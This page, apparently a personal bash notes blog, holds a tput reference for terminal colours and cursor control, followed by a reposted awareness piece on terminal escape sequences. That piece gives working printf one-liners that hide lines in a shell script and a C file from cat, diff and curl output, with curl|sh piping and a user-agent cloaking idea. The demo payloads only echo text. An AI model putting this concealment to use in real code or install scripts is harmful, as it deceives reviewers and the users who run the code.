BASH i okolice
Kolorowanie tekstu w terminalu i inne tamże sztuczki
Here is some more detail on the awesome tput command suggested in Ignacio's answer.
Colour commands
# Set the background colour using ANSI escape tput setab [1-7] # Set the foreground colour using ANSI escape tput setaf [1-7]
Colours are as follows:
Num Colour #define RGB 0 black COLOR_BLACK 0,0,0 1 red COLOR_RED max,0,0 2 green COLOR_GREEN 0,max,0 3 yellow COLOR_YELLOW max,max,0 4 blue COLOR_BLUE 0,0,max 5 magenta COLOR_MAGENTA max,0,max 6 cyan COLOR_CYAN 0,max,max 7 white COLOR_WHITE max,max,max
There are also non-ANSI versions of the colour setting functions (setb
instead of setab
, and setf
instead of setaf
) which use different numbers, not given here.
Text mode commands
tput bold # Select bold mode tput dim # Select dim (half-bright) mode tput smul # Enable underline mode tput rmul # Disable underline mode tput rev # Turn on reverse video mode tput smso # Enter standout (bold) mode tput rmso # Exit standout mode tput sgr 0 # Reset all attributes
Cursor movement commands
tput cup Y X # Move cursor to screen postion X,Y (top left is 0,0) tput cuf N # Move N characters forward (right) tput cub N # Move N characters back (left) tput cuu N # Move N lines up tput ll # Move to last line, first column (if no cup) tput sc # Save the cursor position tput rc # Restore the cursor position tput lines # Output the number of lines of the terminal tput cols # Output the number of columns of the terminal
Clear and insert commands
tput ech N # Erase N characters tput clear # Clear screen and move the cursor to 0,0 tput el 1 # Clear to beginning of line tput el # Clear to end of line tput ed # Clear to end of screen tput ich N # Insert N characters (moves rest of line forward!) tput il N # Insert N lines
Other commands
tput bel # play a bell
With compiz wobbly windows, the bel
command makes the terminal wobble for a second to draw the user's attention.
Example usage
echo „$(tput setaf 1)Red text $(tput setab 7)and white background$(tput sgr 0)”
Looks like this on my Ubuntu terminal:
Use command sgr 0
to reset the colour at the end.
Performing multiple operations at once
tput
accepts scripts containing one command per line, which are executed in order before tput exits.
Avoid temporary files by echoing a multiline string and piping it:
echo -e "setf 7\nsetb 1" | tput -S # set fg white and bg red
See also
- See
man 1 tput
- See
man 5 terminfo
for the complete list of commands and more details on these options. (The corresponding tput command is listed in the Cap-name column of the huge table that starts at line 81.)
Backup bashem
Ciekawostki
Federico Bento ''Terminal escape sequences''
So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?"
This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.
How it technically works:
A terminal escape sequence is a special sequence of characters that is printed (like any other text).
If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.
While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh $ chmod +x backdoor.sh $ cat backdoor.sh #!/bin/bash echo doing something very nice! $ ./backdoor.sh doing something evil!
As you can see, our beloved cat
cheated on us. Why? Because instead of displaying the character-sequence, the escape sequence \033[XA
(being X
the number of times) performed some action. And this action moves the cursor up X
times, overwriting what is above it X
lines. But this doesn't affect only 'cat', it affects everything that
interprets escape sequences.
$ head backdoor.sh #!/bin/bash echo doing something very nice! $ tail backdoor.sh #!/bin/bash echo doing something very nice! $ more backdoor.sh #!/bin/bash echo doing something very nice!
It's not over yet!
$ curl 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice! $ wget -qO - 127.0.0.1/backdoor.sh #!/bin/bash echo doing something very nice!
But if we pipe it into a shell…
$ curl -s 127.0.0.1/backdoor.sh|sh doing something evil! $ wget -qO - 127.0.0.1/backdoor.sh|sh doing something evil!
You might be thinking „If I opened that in my browser, I would detect it being malicious!”
Well, think again…
One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget, and make them download the malicious file, if not, redirect them to a legitimate file that looks like the original output. Your browser would fool you then.
I wouldn't even be surprised if most of those install scripts that make use of these pipe into sh
bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files…
It's no secret, most of us rely on cat
to view files. I guess this is one black kitty, giving you bad luck.
Here's another example with a .c
file
$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do much... */\n\tprintf("doing something very nice\\n");\n\treturn 0;\n}\n' > nice.c $ cat nice.c #include <stdio.h> int main() { /* This simple program doesnt do much... */ printf("doing something very nice\n"); return 0; }
$ gcc nice.c $ ./a.out doing something evil doing something very nice
diff
also interprets escape sequences and so do the resulting patches
Going back to the first example, imagine I have a backdoored.sh
that is backdoored, and a legit.sh that does what it's output tells us.
$ cat backdoor.sh #evil file #!/bin/bash echo doing something very nice! $ cat legit.sh #actually echoes doing something very nice! #!/bin/bash echo doing something very nice! $ diff -Naur backdoor.sh legit.sh --- backdoor.sh 2015-09-17 16:25:42.985349535 +0100 +++ legit.sh 2015-09-17 16:26:14.950158635 +0100 @@ -1,4 +1,2 @@ #!/bin/bash -echo doing something very nice! +echo doing something very nice! $ diff -Naur backdoor.sh legit.sh > file.patch $ patch legit.sh -R file.patch $ chmod +x legit.sh $ ./legit.sh doing something evil!
Hint:
less
doesn't interpret escape sequences unless the -r
switch is used, so stop aliasing it to less -r
just because there's no colored output.
s/party/hack like it's 1999